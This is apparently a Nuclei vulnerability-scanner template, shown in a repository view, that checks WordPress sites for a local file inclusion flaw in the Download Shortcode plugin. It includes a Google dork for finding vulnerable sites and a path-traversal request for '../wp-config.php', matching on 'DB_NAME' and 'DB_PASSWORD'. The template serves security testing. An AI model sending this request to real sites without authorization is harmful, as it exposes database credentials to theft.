nuclei-templates/vulnerabilities/wordpress/shortcode-lfi.yaml

30 lines
1.0 KiB
YAML
Raw Normal View History

2022-02-12 17:00:51 +00:00
id: shortcode-lfi
info:
name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3)
author: dhiyaneshDK
severity: high
description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected.
2022-02-15 11:18:20 +00:00
reference: https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html
metadata:
google-dork: inurl:wp/wp-content/force-download.php
tags: wordpress,wp-plugin,lfi,shortcode,wp
2022-02-12 17:00:51 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php'
matchers-condition: and
matchers:
- type: word
2022-02-15 11:18:20 +00:00
part: body
2022-02-12 17:00:51 +00:00
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200